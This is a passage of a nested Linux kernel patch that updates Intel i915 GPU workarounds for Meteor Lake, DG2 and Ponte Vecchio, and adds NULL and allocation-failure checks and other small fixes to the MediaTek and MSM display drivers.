++	    IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0)) {
++		/* Wa_22012856258 */
++		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2,
++				 GEN12_DISABLE_READ_SUPPRESSION);
++	}
++
++	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_A0, STEP_B0)) {
++		/* Wa_14013392000:dg2_g11 */
++		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2, GEN12_ENABLE_LARGE_GRF_MODE);
+ 	}
+ 
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_A0, STEP_B0) ||
+@@ -2330,14 +2434,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G11(i915) || IS_DG2_G12(i915)) {
+-		/* Wa_22013037850:dg2 */
+-		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW,
+-				DISABLE_128B_EVICTION_COMMAND_UDW);
+-
+-		/* Wa_22012856258:dg2 */
+-		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2,
+-				 GEN12_DISABLE_READ_SUPPRESSION);
+-
+ 		/*
+ 		 * Wa_22010960976:dg2
+ 		 * Wa_14013347512:dg2
+@@ -2386,18 +2482,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 		wa_mcr_masked_en(wal, GEN9_HALF_SLICE_CHICKEN7,
+ 				 DG2_DISABLE_ROUND_ENABLE_ALLOW_FOR_SSLA);
+ 
+-	if (IS_DG2_GRAPHICS_STEP(engine->i915, G10, STEP_A0, STEP_B0)) {
+-		/* Wa_14010680813:dg2_g10 */
+-		wa_write_or(wal, GEN12_GAMSTLB_CTRL, CONTROL_BLOCK_CLKGATE_DIS |
+-			    EGRESS_BLOCK_CLKGATE_DIS | TAG_BLOCK_CLKGATE_DIS);
+-	}
+-
+-	if (IS_DG2_GRAPHICS_STEP(engine->i915, G10, STEP_A0, STEP_B0) ||
+-	    IS_DG2_GRAPHICS_STEP(engine->i915, G11, STEP_A0, STEP_B0)) {
+-		/* Wa_14012362059:dg2 */
+-		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
+-	}
+-
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G10(i915)) {
+ 		/* Wa_22014600077:dg2 */
+@@ -2901,8 +2985,9 @@ add_render_compute_tuning_settings(struct drm_i915_private *i915,
+ 				   struct i915_wa_list *wal)
+ {
+ 	if (IS_PONTEVECCHIO(i915)) {
+-		wa_write(wal, XEHPC_L3SCRUB,
+-			 SCRUB_CL_DWNGRADE_SHARED | SCRUB_RATE_4B_PER_CLK);
++		wa_mcr_write(wal, XEHPC_L3SCRUB,
++			     SCRUB_CL_DWNGRADE_SHARED | SCRUB_RATE_4B_PER_CLK);
++		wa_mcr_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_HOSTCACHEEN);
+ 	}
+ 
+ 	if (IS_DG2(i915)) {
+@@ -2950,9 +3035,24 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 
+ 	add_render_compute_tuning_settings(i915, wal);
+ 
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_PONTEVECCHIO(i915) ||
++	    IS_DG2(i915)) {
++		/* Wa_22014226127 */
++		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0, DISABLE_D8_D16_COASLESCE);
++	}
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_DG2(i915)) {
++		/* Wa_18017747507 */
++		wa_masked_en(wal, VFG_PREEMPTION_CHICKEN, POLYGON_TRIFAN_LINELOOP_DISABLE);
++	}
++
+ 	if (IS_PONTEVECCHIO(i915)) {
+ 		/* Wa_16016694945 */
+-		wa_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_OVRLSCCC);
++		wa_mcr_masked_en(wal, XEHPC_LNCFMISCCFGREG0, XEHPC_OVRLSCCC);
+ 	}
+ 
+ 	if (IS_XEHPSDV(i915)) {
+@@ -2978,30 +3078,14 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 			wa_mcr_masked_dis(wal, MLTICTXCTL, TDONRENDER);
+ 			wa_mcr_write_or(wal, L3SQCREG1_CCS0, FLUSHALLNONCOH);
+ 		}
+-
+-		/* Wa_14012362059:xehpsdv */
+-		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
+-
+-		/* Wa_14014368820:xehpsdv */
+-		wa_write_or(wal, GEN12_GAMCNTRL_CTRL, INVALIDATION_BROADCAST_MODE_DIS |
+-				GLOBAL_INVALIDATION_MODE);
+ 	}
+ 
+ 	if (IS_DG2(i915) || IS_PONTEVECCHIO(i915)) {
+ 		/* Wa_14015227452:dg2,pvc */
+ 		wa_mcr_masked_en(wal, GEN9_ROW_CHICKEN4, XEHP_DIS_BBL_SYSPIPE);
+ 
+-		/* Wa_22014226127:dg2,pvc */
+-		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0, DISABLE_D8_D16_COASLESCE);
+-
+ 		/* Wa_16015675438:dg2,pvc */
+ 		wa_masked_en(wal, FF_SLICE_CS_CHICKEN2, GEN12_PERF_FIX_BALANCING_CFE_DISABLE);
+-
+-		/* Wa_18018781329:dg2,pvc */
+-		wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, VDBX_MOD_CTRL, FORCE_MISS_FTLB);
+-		wa_mcr_write_or(wal, VEBX_MOD_CTRL, FORCE_MISS_FTLB);
+ 	}
+ 
+ 	if (IS_DG2(i915)) {
+@@ -3010,9 +3094,6 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 		 * Wa_22015475538:dg2
+ 		 */
+ 		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW, DIS_CHAIN_2XSIMD8);
+-
+-		/* Wa_18017747507:dg2 */
+-		wa_masked_en(wal, VFG_PREEMPTION_CHICKEN, POLYGON_TRIFAN_LINELOOP_DISABLE);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc.c
+index 52aede324788e..ca940a00e84a3 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc.c
+@@ -274,8 +274,9 @@ static u32 guc_ctl_wa_flags(struct intel_guc *guc)
+ 	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0))
+ 		flags |= GUC_WA_GAM_CREDITS;
+ 
+-	/* Wa_14014475959:dg2 */
+-	if (IS_DG2(gt->i915))
++	/* Wa_14014475959 */
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    IS_DG2(gt->i915))
+ 		flags |= GUC_WA_HOLD_CCS_SWITCHOUT;
+ 
+ 	/*
+@@ -289,7 +290,9 @@ static u32 guc_ctl_wa_flags(struct intel_guc *guc)
+ 		flags |= GUC_WA_DUAL_QUEUE;
+ 
+ 	/* Wa_22011802037: graphics version 11/12 */
+-	if (IS_GRAPHICS_VER(gt->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(gt->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(gt->i915) < IP_VER(12, 70)))
+ 		flags |= GUC_WA_PRE_PARSER;
+ 
+ 	/* Wa_16011777198:dg2 */
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
+index 5b86b2e286e07..42c5d9d2e2182 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_fw.c
+@@ -38,9 +38,8 @@ static void guc_prepare_xfer(struct intel_gt *gt)
+ 
+ 	if (GRAPHICS_VER(uncore->i915) == 9) {
+ 		/* DOP Clock Gating Enable for GuC clocks */
+-		intel_gt_mcr_multicast_write(gt, GEN8_MISCCPCTL,
+-					     GEN8_DOP_CLOCK_GATE_GUC_ENABLE |
+-					     intel_gt_mcr_read_any(gt, GEN8_MISCCPCTL));
++		intel_uncore_rmw(uncore, GEN7_MISCCPCTL, 0,
++				 GEN8_DOP_CLOCK_GATE_GUC_ENABLE);
+ 
+ 		/* allows for 5us (in 10ns units) before GT can go to RC6 */
+ 		intel_uncore_write(uncore, GUC_ARAT_C6DIS, 0x1FF);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index c10977cb06b97..ddf071865adc5 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -1621,7 +1621,7 @@ static void guc_engine_reset_prepare(struct intel_engine_cs *engine)
+ 	intel_engine_stop_cs(engine);
+ 
+ 	/*
+-	 * Wa_22011802037:gen11/gen12: In addition to stopping the cs, we need
++	 * Wa_22011802037: In addition to stopping the cs, we need
+ 	 * to wait for any pending mi force wakeups
+ 	 */
+ 	intel_engine_wait_for_pending_mi_fw(engine);
+@@ -4203,8 +4203,10 @@ static void guc_default_vfuncs(struct intel_engine_cs *engine)
+ 	engine->flags |= I915_ENGINE_HAS_TIMESLICES;
+ 
+ 	/* Wa_14014475959:dg2 */
+-	if (IS_DG2(engine->i915) && engine->class == COMPUTE_CLASS)
+-		engine->flags |= I915_ENGINE_USES_WA_HOLD_CCS_SWITCHOUT;
++	if (engine->class == COMPUTE_CLASS)
++		if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++		    IS_DG2(engine->i915))
++			engine->flags |= I915_ENGINE_USES_WA_HOLD_CCS_SWITCHOUT;
+ 
+ 	/*
+ 	 * TODO: GuC supports timeslicing and semaphores as well, but they're
+diff --git a/drivers/gpu/drm/i915/i915_drv.h b/drivers/gpu/drm/i915/i915_drv.h
+index a380db36d52c4..03c3a59d0939b 100644
+--- a/drivers/gpu/drm/i915/i915_drv.h
++++ b/drivers/gpu/drm/i915/i915_drv.h
+@@ -726,6 +726,10 @@ IS_SUBPLATFORM(const struct drm_i915_private *i915,
+ 	(IS_SUBPLATFORM(__i915, INTEL_METEORLAKE, INTEL_SUBPLATFORM_##variant) && \
+ 	 IS_GRAPHICS_STEP(__i915, since, until))
+ 
++#define IS_MTL_MEDIA_STEP(__i915, since, until) \
++	(IS_METEORLAKE(__i915) && \
++	 IS_MEDIA_STEP(__i915, since, until))
++
+ /*
+  * DG2 hardware steppings are a bit unusual.  The hardware design was forked to
+  * create three variants (G10, G11, and G12) which each have distinct
+diff --git a/drivers/gpu/drm/i915/intel_device_info.c b/drivers/gpu/drm/i915/intel_device_info.c
+index 849baf6c3b3c6..05e90d09b2081 100644
+--- a/drivers/gpu/drm/i915/intel_device_info.c
++++ b/drivers/gpu/drm/i915/intel_device_info.c
+@@ -343,6 +343,12 @@ static void intel_ipver_early_init(struct drm_i915_private *i915)
+ 
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_GRAPHICS),
+ 		    &runtime->graphics.ip);
++	/* Wa_22012778468 */
++	if (runtime->graphics.ip.ver == 0x0 &&
++	    INTEL_INFO(i915)->platform == INTEL_METEORLAKE) {
++		RUNTIME_INFO(i915)->graphics.ip.ver = 12;
++		RUNTIME_INFO(i915)->graphics.ip.rel = 70;
++	}
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_DISPLAY),
+ 		    &runtime->display.ip);
+ 	ip_ver_read(i915, i915_mmio_reg_offset(GMD_ID_MEDIA),
+diff --git a/drivers/gpu/drm/i915/intel_pm.c b/drivers/gpu/drm/i915/intel_pm.c
+index 73c88b1c9545c..ac61df46d02c5 100644
+--- a/drivers/gpu/drm/i915/intel_pm.c
++++ b/drivers/gpu/drm/i915/intel_pm.c
+@@ -4299,8 +4299,8 @@ static void gen8_set_l3sqc_credits(struct drm_i915_private *dev_priv,
+ 	u32 val;
+ 
+ 	/* WaTempDisableDOPClkGating:bdw */
+-	misccpctl = intel_gt_mcr_multicast_rmw(to_gt(dev_priv), GEN8_MISCCPCTL,
+-					       GEN8_DOP_CLOCK_GATE_ENABLE, 0);
++	misccpctl = intel_uncore_rmw(&dev_priv->uncore, GEN7_MISCCPCTL,
++				     GEN7_DOP_CLOCK_GATE_ENABLE, 0);
+ 
+ 	val = intel_gt_mcr_read_any(to_gt(dev_priv), GEN8_L3SQCREG1);
+ 	val &= ~L3_PRIO_CREDITS_MASK;
+@@ -4314,7 +4314,7 @@ static void gen8_set_l3sqc_credits(struct drm_i915_private *dev_priv,
+ 	 */
+ 	intel_gt_mcr_read_any(to_gt(dev_priv), GEN8_L3SQCREG1);
+ 	udelay(1);
+-	intel_gt_mcr_multicast_write(to_gt(dev_priv), GEN8_MISCCPCTL, misccpctl);
++	intel_uncore_write(&dev_priv->uncore, GEN7_MISCCPCTL, misccpctl);
+ }
+ 
+ static void icl_init_clock_gating(struct drm_i915_private *dev_priv)
+@@ -4465,8 +4465,8 @@ static void skl_init_clock_gating(struct drm_i915_private *dev_priv)
+ 	gen9_init_clock_gating(dev_priv);
+ 
+ 	/* WaDisableDopClockGating:skl */
+-	intel_gt_mcr_multicast_rmw(to_gt(dev_priv), GEN8_MISCCPCTL,
+-				   GEN8_DOP_CLOCK_GATE_ENABLE, 0);
++	intel_uncore_rmw(&dev_priv->uncore, GEN7_MISCCPCTL,
++			 GEN7_DOP_CLOCK_GATE_ENABLE, 0);
+ 
+ 	/* WAC6entrylatency:skl */
+ 	intel_uncore_rmw(&dev_priv->uncore, FBC_LLC_READ_CTRL, 0, FBC_LLC_FULLY_OPEN);
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 112615817dcbe..5071f1263216b 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -945,6 +945,8 @@ int mtk_drm_crtc_create(struct drm_device *drm_dev,
+ 
+ 	mtk_crtc->planes = devm_kcalloc(dev, num_comp_planes,
+ 					sizeof(struct drm_plane), GFP_KERNEL);
++	if (!mtk_crtc->planes)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < mtk_crtc->ddp_comp_nr; i++) {
+ 		ret = mtk_drm_crtc_init_comp_planes(drm_dev, mtk_crtc, i,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index cd5b18ef79512..d3e57dd79f5f5 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -520,6 +520,7 @@ static int mtk_drm_bind(struct device *dev)
+ err_deinit:
+ 	mtk_drm_kms_deinit(drm);
+ err_free:
++	private->drm = NULL;
+ 	drm_dev_put(drm);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 47e96b0289f98..6c204ccfb9ece 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -164,8 +164,6 @@ static int mtk_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 
+ 	ret = dma_mmap_attrs(priv->dma_dev, vma, mtk_gem->cookie,
+ 			     mtk_gem->dma_addr, obj->size, mtk_gem->dma_attrs);
+-	if (ret)
+-		drm_gem_vm_close(vma);
+ 
+ 	return ret;
+ }
+@@ -262,6 +260,6 @@ void mtk_drm_gem_prime_vunmap(struct drm_gem_object *obj,
+ 		return;
+ 
+ 	vunmap(vaddr);
+-	mtk_gem->kvaddr = 0;
++	mtk_gem->kvaddr = NULL;
+ 	kfree(mtk_gem->pages);
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3b7d13028fb6b..9e1363c9fcdb4 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -721,7 +721,7 @@ static void mtk_dsi_lane_ready(struct mtk_dsi *dsi)
+ 		mtk_dsi_clk_ulp_mode_leave(dsi);
+ 		mtk_dsi_lane0_ulp_mode_leave(dsi);
+ 		mtk_dsi_clk_hs_mode(dsi, 0);
+-		msleep(20);
++		usleep_range(1000, 3000);
+ 		/* The reaction time after pulling up the mipi signal for dsi_rx */
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 3605f095b2de2..8175997663299 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -1083,13 +1083,13 @@ int adreno_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ void adreno_gpu_cleanup(struct adreno_gpu *adreno_gpu)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+-	struct msm_drm_private *priv = gpu->dev->dev_private;
++	struct msm_drm_private *priv = gpu->dev ? gpu->dev->dev_private : NULL;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(adreno_gpu->info->fw); i++)
+ 		release_firmware(adreno_gpu->fw[i]);
+ 
+-	if (pm_runtime_enabled(&priv->gpu_pdev->dev))
++	if (priv && pm_runtime_enabled(&priv->gpu_pdev->dev))
+ 		pm_runtime_disable(&priv->gpu_pdev->dev);
+ 
+ 	msm_gpu_cleanup(&adreno_gpu->base);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 13ce321283ff9..c9d1c412628e9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -968,7 +968,10 @@ static void dpu_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		dpu_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	if (cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ /**
+@@ -1150,6 +1153,8 @@ static int dpu_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool needs_dirtyfb = dpu_crtc_needs_dirtyfb(crtc_state);
+ 
+ 	pstates = kzalloc(sizeof(*pstates) * DPU_STAGE_MAX * 4, GFP_KERNEL);
++	if (!pstates)
++		return -ENOMEM;
+ 
+ 	if (!crtc_state->enable || !crtc_state->active) {
+ 		DRM_DEBUG_ATOMIC("crtc%d -> enable %d, active %d, skip atomic_check\n",
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 2196e205efa5e..83f1dd2c22bd7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -459,6 +459,8 @@ static const struct dpu_mdp_cfg sc7180_mdp[] = {
+ 		.reg_off = 0x2B4, .bit_off = 8},
+ 	.clk_ctrls[DPU_CLK_CTRL_CURSOR1] = {
+ 		.reg_off = 0x2C4, .bit_off = 8},
++	.clk_ctrls[DPU_CLK_CTRL_WB2] = {
++		.reg_off = 0x3B8, .bit_off = 24},
+ 	},
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+index b71199511a52d..09757166a064a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+@@ -930,6 +930,11 @@ static void dpu_kms_mdp_snapshot(struct msm_disp_state *disp_state, struct msm_k
+ 	msm_disp_snapshot_add_block(disp_state, cat->mdp[0].len,
+ 			dpu_kms->mmio + cat->mdp[0].base, "top");
+ 
++	/* dump DSC sub-blocks HW regs info */
++	for (i = 0; i < cat->dsc_count; i++)
++		msm_disp_snapshot_add_block(disp_state, cat->dsc[i].len,
++				dpu_kms->mmio + cat->dsc[i].base, "dsc_%d", i);
++
+ 	pm_runtime_put_sync(&dpu_kms->pdev->dev);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 86719020afe20..bfd5be89e8b8d 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -1126,7 +1126,7 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	struct dpu_plane_state *pstate = to_dpu_plane_state(state);
+ 	struct drm_crtc *crtc = state->crtc;
+ 	struct drm_framebuffer *fb = state->fb;
+-	bool is_rt_pipe, update_qos_remap;
++	bool is_rt_pipe;
+ 	const struct dpu_format *fmt =
+ 		to_dpu_format(msm_framebuffer_format(fb));
+ 	struct dpu_hw_pipe_cfg pipe_cfg;
+@@ -1138,6 +1138,9 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	pstate->pending = true;
+ 
+ 	is_rt_pipe = (dpu_crtc_get_client_type(crtc) != NRT_CLIENT);
++	pstate->needs_qos_remap |= (is_rt_pipe != pdpu->is_rt_pipe);
++	pdpu->is_rt_pipe = is_rt_pipe;
++
+ 	_dpu_plane_set_qos_ctrl(plane, false, DPU_PLANE_QOS_PANIC_CTRL);
+ 
+ 	DPU_DEBUG_PLANE(pdpu, "FB[%u] " DRM_RECT_FP_FMT "->crtc%u " DRM_RECT_FMT
+@@ -1219,14 +1222,8 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 		_dpu_plane_set_ot_limit(plane, crtc, &pipe_cfg);
+ 	}
+ 
+-	update_qos_remap = (is_rt_pipe != pdpu->is_rt_pipe) ||
+-			pstate->needs_qos_remap;
+-
+-	if (update_qos_remap) {
+-		if (is_rt_pipe != pdpu->is_rt_pipe)
+-			pdpu->is_rt_pipe = is_rt_pipe;
+-		else if (pstate->needs_qos_remap)
+-			pstate->needs_qos_remap = false;
++	if (pstate->needs_qos_remap) {
++		pstate->needs_qos_remap = false;
+ 		_dpu_plane_set_qos_remap(plane);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 73b3442e74679..7ada957adbbb8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -660,6 +660,11 @@ int dpu_rm_get_assigned_resources(struct dpu_rm *rm,
+ 				  blks_size, enc_id);
+ 			break;
+ 		}
++		if (!hw_blks[i]) {
++			DPU_ERROR("Allocated resource %d unavailable to assign to enc %d\n",
++				  type, enc_id);
++			break;
++		}
+ 		blks[num_blks++] = hw_blks[i];
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+index 088ec990a2f26..2a5a68366582b 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+@@ -70,6 +70,8 @@ int dpu_writeback_init(struct drm_device *dev, struct drm_encoder *enc,
+ 	int rc = 0;
+ 
+ 	dpu_wb_conn = devm_kzalloc(dev->dev, sizeof(*dpu_wb_conn), GFP_KERNEL);
++	if (!dpu_wb_conn)
++		return -ENOMEM;
+ 
+ 	drm_connector_helper_add(&dpu_wb_conn->base.base, &dpu_wb_conn_helper_funcs);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+index e86421c69bd1f..86036dd4e1e82 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+@@ -1139,7 +1139,10 @@ static void mdp5_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		mdp5_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	if (mdp5_cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ static const struct drm_crtc_funcs mdp5_crtc_no_lm_cursor_funcs = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_cfg.c b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+index 7e97c239ed489..e0bd452a9f1e6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_cfg.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+@@ -209,8 +209,8 @@ static const struct msm_dsi_config sc7280_dsi_cfg = {
+ 	.num_regulators = ARRAY_SIZE(sc7280_dsi_regulators),
+ 	.bus_clk_names = dsi_sc7280_bus_clk_names,
+ 	.num_bus_clks = ARRAY_SIZE(dsi_sc7280_bus_clk_names),
+-	.io_start = { 0xae94000 },
+-	.num_dsi = 1,
++	.io_start = { 0xae94000, 0xae96000 },
++	.num_dsi = 2,
+ };
+ 
+ static const char * const dsi_qcm2290_bus_clk_names[] = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 89aadd3b3202b..f167a45f1fbdd 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1977,6 +1977,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 
+ 	/* setup workqueue */
+ 	msm_host->workqueue = alloc_ordered_workqueue("dsi_drm_work", 0);
++	if (!msm_host->workqueue)
++		return -ENOMEM;
++
+ 	INIT_WORK(&msm_host->err_work, dsi_err_worker);
+ 
+ 	msm_dsi->id = msm_host->id;
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index 97372bb241d89..4ad36bc8fe5ed 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -120,6 +120,10 @@ static int msm_hdmi_init(struct hdmi *hdmi)
+ 	int ret;
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
++	if (!hdmi->workq) {
++		ret = -ENOMEM;
++		goto fail;
++	}
+ 
+ 	hdmi->i2c = msm_hdmi_i2c_init(hdmi);
+ 	if (IS_ERR(hdmi->i2c)) {
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 45e81eb148a8d..ee2f60b6f09b3 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -491,7 +491,7 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 		if (IS_ERR(priv->event_thread[i].worker)) {
+ 			ret = PTR_ERR(priv->event_thread[i].worker);
+ 			DRM_DEV_ERROR(dev, "failed to create crtc_event kthread\n");
+-			ret = PTR_ERR(priv->event_thread[i].worker);
++			priv->event_thread[i].worker = NULL;
+ 			goto err_msm_uninit;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/msm/msm_fence.c b/drivers/gpu/drm/msm/msm_fence.c
+index a47e5837c528f..56641408ea742 100644
+--- a/drivers/gpu/drm/msm/msm_fence.c
++++ b/drivers/gpu/drm/msm/msm_fence.c
+@@ -22,7 +22,7 @@ msm_fence_context_alloc(struct drm_device *dev, volatile uint32_t *fenceptr,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	fctx->dev = dev;
+-	strncpy(fctx->name, name, sizeof(fctx->name));
++	strscpy(fctx->name, name, sizeof(fctx->name));
+ 	fctx->context = dma_fence_context_alloc(1);
+ 	fctx->index = index++;
+ 	fctx->fenceptr = fenceptr;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 73a2ca122c570..1c4be193fd23f 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -209,6 +209,10 @@ static int submit_lookup_cmds(struct msm_gem_submit *submit,
+ 			goto out;
